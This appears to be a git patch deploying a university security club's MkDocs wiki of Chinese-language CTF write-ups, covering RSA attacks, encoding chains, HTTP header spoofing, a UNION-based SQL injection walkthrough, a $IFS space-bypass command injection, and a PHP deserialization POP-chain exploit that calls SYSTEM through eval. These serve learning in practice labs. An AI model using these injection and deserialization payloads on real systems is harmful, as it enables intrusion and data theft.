From 7e0c71c0ff274b72f6bdae355c8e0120ffea4e91 Mon Sep 17 00:00:00 2001 From: icecliffs Date: Tue, 15 Aug 2023 20:48:28 +0800 Subject: [PATCH] Deployed 0caa7ba with MkDocs version: 1.4.3 --- 404.html | 443 +++++ award/index.html | 443 +++++ ctfnotes/CTF-CPYPTO-2/index.html | 1297 ++++++++++++++ ctfnotes/CTF-CRYPTO-1/index.html | 1286 ++++++++++++++ ctfnotes/CTF-CRYPTO-3/index.html | 1341 +++++++++++++++ ctfnotes/CTF-CRYPTO-4/index.html | 1323 +++++++++++++++ ctfnotes/CTF-CRYPTO-5/index.html | 1279 ++++++++++++++ ctfnotes/CTF-WEB-2/index.html | 1283 ++++++++++++++ ctfnotes/CTF-Web-1/index.html | 1323 +++++++++++++++ .../index.html" | 1490 +++++++++++++++++ ctfnotes/problem-1096-wp/index.html | 1272 ++++++++++++++ ctfnotes/problem-1852-wp/index.html | 1367 +++++++++++++++ ctfnotes/problem-2026-wp/index.html | 1285 ++++++++++++++ ctfnotes/problem-2036-wp/index.html | 1295 ++++++++++++++ ctfnotes/problem-2049-wp/index.html | 1280 ++++++++++++++ ctfnotes/problem-2074-wp/index.html | 1268 ++++++++++++++ ctfnotes/problem-2076-wp/index.html | 1275 ++++++++++++++ ctfnotes/problem-2099-wp/index.html | 1349 +++++++++++++++ ctfnotes/problem-227-wp/index.html | 1291 ++++++++++++++ ctfnotes/problem-2422-wp/index.html | 1306 +++++++++++++++ ctfnotes/problem-2602-wp/index.html | 1276 ++++++++++++++ ctfnotes/problem-39-wp/index.html | 1282 ++++++++++++++ ctfnotes/problem-403-wp/index.html | 1286 ++++++++++++++ ctfnotes/problem-404-wp/index.html | 1293 ++++++++++++++ ctfnotes/problem-413-wp/index.html | 1344 +++++++++++++++ ctfnotes/problem-440-wp/index.html | 1334 +++++++++++++++ ctfnotes/problem-442-wp/index.html | 1283 ++++++++++++++ ctfnotes/problem-444-wp/index.html | 1310 +++++++++++++++ ctfnotes/problem-463-wp/index.html | 1276 ++++++++++++++ ctfnotes/problem-47-wp/index.html | 1275 ++++++++++++++ index.html | 443 +++++ member/index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 443 +++++ .../index.html | 445 +++++ search/search_index.json | 2 +- sitemap.xml | 176 +- sitemap.xml.gz | Bin 615 -> 785 bytes writeup/CISCN-CTF-Quals-2023/index.html | 443 +++++ 50 files changed, 45147 insertions(+), 19 deletions(-) create mode 100755 ctfnotes/CTF-CPYPTO-2/index.html create mode 100755 ctfnotes/CTF-CRYPTO-1/index.html create mode 100755 ctfnotes/CTF-CRYPTO-3/index.html create mode 100755 ctfnotes/CTF-CRYPTO-4/index.html create mode 100755 ctfnotes/CTF-CRYPTO-5/index.html create mode 100755 ctfnotes/CTF-WEB-2/index.html create mode 100755 ctfnotes/CTF-Web-1/index.html create mode 100755 "ctfnotes/RSA\347\256\227\346\263\225\345\216\237\347\220\206/index.html" create mode 100755 ctfnotes/problem-1096-wp/index.html create mode 100755 ctfnotes/problem-1852-wp/index.html create mode 100755 ctfnotes/problem-2026-wp/index.html create mode 100755 ctfnotes/problem-2036-wp/index.html create mode 100755 ctfnotes/problem-2049-wp/index.html create mode 100755 ctfnotes/problem-2074-wp/index.html create mode 100755 ctfnotes/problem-2076-wp/index.html create mode 100755 ctfnotes/problem-2099-wp/index.html create mode 100755 ctfnotes/problem-227-wp/index.html create mode 100755 ctfnotes/problem-2422-wp/index.html create mode 100755 ctfnotes/problem-2602-wp/index.html create mode 100755 ctfnotes/problem-39-wp/index.html create mode 100755 ctfnotes/problem-403-wp/index.html create mode 100755 ctfnotes/problem-404-wp/index.html create mode 100755 ctfnotes/problem-413-wp/index.html create mode 100755 ctfnotes/problem-440-wp/index.html create mode 100755 ctfnotes/problem-442-wp/index.html create mode 100755 ctfnotes/problem-444-wp/index.html create mode 100755 ctfnotes/problem-463-wp/index.html create mode 100755 ctfnotes/problem-47-wp/index.html diff --git a/404.html b/404.html index 82c07de..cdebf0a 100755 --- a/404.html +++ b/404.html @@ -216,6 +216,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -623,6 +639,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/award/index.html b/award/index.html index 35babb3..abcd08c 100755 --- a/award/index.html +++ b/award/index.html @@ -229,6 +229,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -742,6 +758,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/ctfnotes/CTF-CPYPTO-2/index.html b/ctfnotes/CTF-CPYPTO-2/index.html new file mode 100755 index 0000000..3bbeee5 --- /dev/null +++ b/ctfnotes/CTF-CPYPTO-2/index.html @@ -0,0 +1,1297 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + CTF CPYPTO wp-2 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    CTF CPYPTO happy

    +

    下载下来附件

    +

    ('c=', '0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9eL') +('e=', '0x872a335')

    +

    q + q*p^3 =1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586

    +

    qp + q *p^2 = 1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594

    +

    由于0x开头没有L,先把L去掉

    +

    使用gmpy2 编写python脚本

    +
    import gmpy2
+import sympy
+from Crypto.Util.number import *
+c = 0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9e
+
+e = 0x872a335
+
+k1=1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586
+k2 =gmpy2.mpz(k1)
+k2=1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594
+
+p=sympy.Symbol('p')
+q=sympy.Symbol('q')
+solved_value=sympy.solve([q + q*p**3 - k1,q*p + q*p**2 -k2], [p,q])
+print(solved_value)
+p=1158310153629932205401500375817
+q=827089796345539312201480770649
+
+d = gmpy2.invert(e,(p-1)*(q-1))
+m = gmpy2.powmod(c,d,p*q)
+print(long_to_bytes(m))
+
    +

    得到flag

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/CTF-CRYPTO-1/index.html b/ctfnotes/CTF-CRYPTO-1/index.html new file mode 100755 index 0000000..4797177 --- /dev/null +++ b/ctfnotes/CTF-CRYPTO-1/index.html @@ -0,0 +1,1286 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + CTF CRYPTO wp-1 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    ez_rsa:

    +

    下载附件:

    +

    image-20230506225531196

    +

    用编写python代码,因为RSA可逆 :

    +
    p = 1325465431
+
+q = 152317153
+
+e = 65537
+
+n = p*q
+
+L = (p-1)*(q-1)
+
+d = pow(e,-1,L)
+
+print(d)
+
    +

    解出D=43476042047970113

    +

    再经过md5加密得到flag

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/CTF-CRYPTO-3/index.html b/ctfnotes/CTF-CRYPTO-3/index.html new file mode 100755 index 0000000..6fb15fc --- /dev/null +++ b/ctfnotes/CTF-CRYPTO-3/index.html @@ -0,0 +1,1341 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + CTF CRYPTO wp-3 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    RSA共模:

    +

    附件.py:

    +
    from gmpy2 import *
+
+from Crypto.Util.number import *
+
+
+flag  = '***************'
+
+p = getPrime(512)
+
+q = getPrime(512)
+
+m1 = bytes_to_long(bytes(flag.encode()))
+
+
+n = p*q
+
+e1 = getPrime(32)
+
+e2 = getPrime(32)
+
+print()
+
+flag1 = pow(m1,e1,n)
+
+flag2 = pow(m1,e2,n)
+
+print('flag1= '+str(flag1))
+
+print('flag2= '+str(flag2))
+
+print('e1= ' +str(e1))
+
+print('e2= '+str(e2))
+
+print('n= '+str(n))
+
+
+
+flag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280
+
+flag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075
+
+e1= 3247473589
+
+e2= 3698409173
+
+n= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313
+
    +

    python脚本

    +
    from gmpy2 import *
+from Crypto.Util.number import *
+
+flag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280
+flag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075
+e1= 3247473589
+e2= 3698409173
+n= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313
+
+def egcd(a, b):
+  if a == 0:
+    return (b, 0, 1)
+  else:
+    g, y, x = egcd(b % a, a)
+    return (g, x - (b // a) * y, y)
+s = egcd(e1,e2)
+s1 = s[1]
+s2 = s[2]
+m = pow(flag1,s1,n)*pow(flag2,s2,n) % n
+# print(m)
+flag = long_to_bytes(m)
+print(flag)
+
    +

    求得NSSCTF{xxxxx**xxxxx}

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/CTF-CRYPTO-4/index.html b/ctfnotes/CTF-CRYPTO-4/index.html new file mode 100755 index 0000000..81e654e --- /dev/null +++ b/ctfnotes/CTF-CRYPTO-4/index.html @@ -0,0 +1,1323 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + CTF CRYPTO wp-4 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [羊城杯 2021]Bigrsa

    +

    附件提示:共享素数

    +

    from Crypto.Util.number import * +from gmpy2 import *

    +

    from flag import *

    +
    from Crypto.Util.number import *
+from flag import *
+
+n1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061
+n2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073
+e = 65537
+
+# m = bytes_to_long(flag)
+
+# c = pow(m, e, n1)
+
+# c = pow(c, e, n2)
+
+# print("c = %d" % c)
+
+# output
+
+c = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264
+
    +

    编写脚本

    +
    from Crypto.Util.number import *
+from gmpy2 import *
+# from flag import *
+
+n1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061
+n2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073
+e = 65537
+# m = bytes_to_long(flag)
+# c = pow(m, e, n1)
+# c = pow(c, e, n2)
+
+# print("c = %d" % c)
+
+# output
+c = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264
+
+p=GCD(n1,n2)
+q1=n1//p
+q2=n2//p
+
+phi1=(p-1)*(q1-1)
+phi2=(p-1)*(q2-1)
+
+d1=gmpy2.invert(e,phi1)
+d2=gmpy2.invert(e,phi2)
+c1=pow(c,d2,n2)
+m=pow(c1,d1,n1)
+flag = long_to_bytes(m)
+print(flag)
+
    +

    得flag:

    +

    SangFor{qSccmm1WrgvIg2Uq_cZhmqNfEGTz2GV8}

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/CTF-CRYPTO-5/index.html b/ctfnotes/CTF-CRYPTO-5/index.html new file mode 100755 index 0000000..5c75e9d --- /dev/null +++ b/ctfnotes/CTF-CRYPTO-5/index.html @@ -0,0 +1,1279 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + CTF CRYPTO wp-5 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [鹤城杯 2021]A_CRYPTO

    +

    4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35

    +

    先rot 13

    +

    得4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35

    +

    再base16

    +

    KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5

    +

    再base32

    +

    V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==

    +

    再base64

    +

    得W^7?+dsi@bUwJTfUt=_GUvgz(F)?{xWo~0IWHD}MA$<

    +

    最后在https://gchq.github.io/CyberChef/上转base85

    +

    +

    image-20230509095258461

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/CTF-WEB-2/index.html b/ctfnotes/CTF-WEB-2/index.html new file mode 100755 index 0000000..bc162f0 --- /dev/null +++ b/ctfnotes/CTF-WEB-2/index.html @@ -0,0 +1,1283 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + CTF WEB wp-2 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    easy_sql

    +

    title提示参数是wllm

    +

    image-20230508181638284

    +

    order by查看有几列

    +

    image-20230508181835146

    +

    得到3列

    +

    改wllm=-1

    +

    ?wllm=-1’ union select 1,2,3 --+

    +

    得到2,3

    +

    ?wllm=-1' union select 1,2,database()--+

    +

    image-20230508182512722

    +

    ?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

    +

    image-20230508183530836

    +

    ?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_tb'--+

    +

    image-20230508183620245

    +

    /?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+

    +

    得到flag

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/CTF-Web-1/index.html b/ctfnotes/CTF-Web-1/index.html new file mode 100755 index 0000000..e7df651 --- /dev/null +++ b/ctfnotes/CTF-Web-1/index.html @@ -0,0 +1,1323 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + CTF WEB wp-1 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    CTF WEB wp-1

    + +

    Do_you_konw_http

    +

    image-20230505202140883

    +

    提示修改user agent 为WLLM

    +

    使用burp抓包 然后send 到 repeater中 在repeater中修改为WLLM

    +

    得到

    +

    image-20230505202532362

    +

    提示有个a.php

    +

    解除拦截后进入到a.php

    +

    image-20230505202803151

    +

    要将地址改为本地的回环地址,也就是127.0.0.1

    +

    使用fakeip插件进行修改ip

    +

    image-20230505203007068

    +

    显示success,并发现secretttt.php

    +

    image-20230505203152739

    +

    进入到secretttt.php 得到flag

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git "a/ctfnotes/RSA\347\256\227\346\263\225\345\216\237\347\220\206/index.html" "b/ctfnotes/RSA\347\256\227\346\263\225\345\216\237\347\220\206/index.html" new file mode 100755 index 0000000..746ebe6 --- /dev/null +++ "b/ctfnotes/RSA\347\256\227\346\263\225\345\216\237\347\220\206/index.html" @@ -0,0 +1,1490 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + RSA算法原理 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    RSA算法原理

    +

    本文借鉴了https://en.wikipedia.org/wiki/RSA_(cryptosystem) 中的资料和些图片

    +

    一、RSA加密过程:

    +

    (1)RSA基本原则:

    +

    ​ RSA 背后的一个基本原则是观察到找到三个非常大的正整数 e、d 和 n 是可行的,使得对所有整数 m(0 ≤ m < n)进行模幂运算:

    +

    {\displaystyle (m^{e})^{d}\equiv m{\pmod {n}}}

    +

    ​ 三杠表示模同余,也就是当调换e和d的位置,会有相同的余数

    +

    {\displaystyle (m^{d})^{e}\equiv m{\pmod {n}}.}

    +

    RSA 涉及公钥私钥。公钥是众所周知的,用于加密消息。目的是使用公钥加密的消息只能在合理的时间内使用私钥解密。公钥由整数ne表示,私钥由整数d表示(尽管在解密过程中也会使用n,因此它也可能被认为是私钥的一部分)。m代表消息。

    +

    (2)密钥生成:

    +

    RSA算法的密钥以下方式生成:

    +

    1.选择两个相差大的大质数 p 和 q

    +

    ​ 为了使得因式分解更难,p和q要随机选择:为了选择它们,标准方法是选择随机整数并使用素数测试,直到找到两个素数。p和q应保密

    +

    2.计算n

    +

    ​ n = p*q

    +

    ​ n作为公钥和私钥的模数。它的长度,通常用比特来表示,就是密钥长度

    +

    3.计算λ ( n )

    +

    数论这一数学分支中,正整数nCarmichael 函数 λ ( n )是满足以下条件的 最小正整数m

    +

    a^{m}\equiv 1{\pmod {n}}

    +

    ​ 在代数术语中,λ ( n )是整数乘法群对n取模的指数。

    +

    由于n = pq , λ ( n ) = lcm ( λ ( p ), λ ( q )),并且由于pq是素数,因此λ ( p ) = φ ( p ) = p − 1,同样地λ ( q ) = q − 1。因此λ( n ) = lcm( p − 1, q − 1)。

    +

    4.选择一个整数e使得2 < e < λ ( n )和gcd ( e , λ ( n )) = 1;也就是说,eλ ( n )互

    +

    ​ 最常选择的e值是2^16 + 1 =65537

    +

    ​ e作为公钥的一部分发布

    +

    5.确定d

    +

    de −1 (mod λ ( n ));也就是说,deλ ( n )的模乘逆

    +

    +

    二、RAS解密过程:

    +

    ​ 通过计算使得私钥指数从d到c恢复m

    +

    {\displaystyle c^{d}\equiv (m^{e})^{d}\equiv m{\pmod {n}}.}

    +

    示例:

    +

    image-20230507160332592

    +

    ​ 但实际使用中国余数定理来加速因子模数的计算(mod pq 使用 mod p 和 mod q)

    +
    中国余数算法:
    +

    {\displaystyle d_{P}=d{\pmod {p-1}},}

    +

    {\displaystyle d_{Q}=d{\pmod {q-1}},}

    +

    {\displaystyle q_{\text{inv}}=q^{-1}{\pmod {p}}。}

    +

    image-20230507161311720

    +

    签名消息

    +

    假设 Alice 希望向 Bob 发送一条签名消息。她可以使用自己的私钥来这样做。她生成消息的散列值,将其计算为d的幂(模n)(就像她在解密消息时所做的那样),并将其作为“签名”附加到消息中。当 Bob 收到签名消息时,他使用相同的哈希算法结合 Alice 的公钥。他对签名求e次方(模n)(就像他在加密消息时所做的那样),并将生成的散列值与消息的散列值进行比较。如果两者一致,他就知道消息的作者拥有爱丽丝的私钥,并且消息自发送以来没有被篡改过。

    +

    这是运用了求幂规则:

    +

    image-20230507161804764

    +

    费马小定理

    +

    ​ 如果p是素数,则对于任意的a,数a^p-a是p的整数倍。

    +

    a^p \equiv a \pmod p。

    +

    例如 a =2, p =7 则 2^7 = 128,128-2=126=7*18 为7的整数倍

    +

    如果a 不能被p整除,即如果a与p互质,费马小定理等价于(p^-1)-1是p的整数倍

    +

    a^{p-1} \equiv 1 \pmod p。

    +

    总结:

    +

    在RSA密码应用中,公钥是被公开的,即e和n的数值是可以被得到的。破解RSA密码就是从已知的额和n求得d。这样就可以使用私钥来破解密文了。

    +

    但当p和q是一个很大的素数时,从n去分解因子p和q,是数学界公认的难题。

    +

    因此,在进行RSA加密的时候,应尽量的使用足够大的p和q,来保证d不会被算出

    +

    但是,RSA的缺点也很明显:

    +

    ​ RSA的安全性完全来自于因子分解,破译RSA的难度等价于分解因子的难度

    +

    ​ 密钥的产生十分麻烦,受到p和q的影响,很难做到一次一个密钥

    +

    ​ RSA需要更长的密钥,这就使得运算速度较慢。

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-1096-wp/index.html b/ctfnotes/problem-1096-wp/index.html new file mode 100755 index 0000000..c363d53 --- /dev/null +++ b/ctfnotes/problem-1096-wp/index.html @@ -0,0 +1,1272 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [GXYCTF 2019]Ping Ping Ping - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [GXYCTF 2019]Ping Ping Ping

    +

    沙箱 +$ISF9绕过空格

    +

    exp +?ip=localhost;a=ag;b=fl;cat$IFS$9$b$a.php

    +

    然后F12看就能看到了~~才不会说因为这个卡了多久~~

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-1852-wp/index.html b/ctfnotes/problem-1852-wp/index.html new file mode 100755 index 0000000..96b64f5 --- /dev/null +++ b/ctfnotes/problem-1852-wp/index.html @@ -0,0 +1,1367 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [NISACTF 2022]babyserialize - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [NISACTF 2022]babyserialize

    +
      +
    1. 审计源码
      2. +
    2. 构建pop链
      3. +
    +
    NISA.__invoke()
+=>Ilovetxw.__toString()
+    =>four.__set(fun,"sixsixsix")
+        =>Ilovetxw.__call(nisa,"sixsixsix")
+            =>TianXiWei.__wakeup()
+
    +
      +
    1. 写exp
      2. +
    +
    <?php
+
+class NISA
+{
+    public $fun = "show_me_fla";
+    public $txw4ever;
+    public function __wakeup()
+    {
+        if ($this->fun == "show_me_flag") {
+            hint();
+        }
+    }
+    function __call($from, $val)
+    {
+        $this->fun = $val[0];
+    }
+
+    public function __toString()
+    {
+        echo $this->fun;
+        return " ";
+    }
+    public function __invoke()
+    {
+        checkcheck($this->txw4ever);
+        @eval($this->txw4ever);
+    }
+}
+
+class TianXiWei
+{
+    public $ext;
+    public $x;
+    public function __wakeup()
+    {
+        $this->ext->nisa($this->x);
+    }
+}
+
+class Ilovetxw
+{
+    public $huang;
+    public $su;
+    public function __call($fun1, $arg)
+    {
+        $this->huang->fun = $arg[0];
+    }
+
+    public function __toString()
+    {
+        $bb = $this->su;
+        return $bb();
+    }
+}
+
+class four
+{
+    public $a = "TXW4EVER";
+    private $fun = 'abc';
+    public function __set($name, $value)
+    {
+        $this->$name = $value;
+        if ($this->fun = "sixsixsix") {
+            strtolower($this->a);
+        }
+    }
+}
+
+$a = new NISA;
+$b = new Ilovetxw;
+$c = new four;
+$d = new Ilovetxw;
+$f = new TianXiWei;
+//
+//$a->txw4ever = 'SYSTEM("ls /");';
+$a->txw4ever = 'SYSTEM("cat /fllllllaaag");';
+$b->su = $a;
+$c->a = $b;
+$d->huang = $c;
+$f->x = "sixsixsix";
+$f->ext = $d;
+
+echo urlencode(serialize($f));
+//
+
+
    +

    得到flag

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
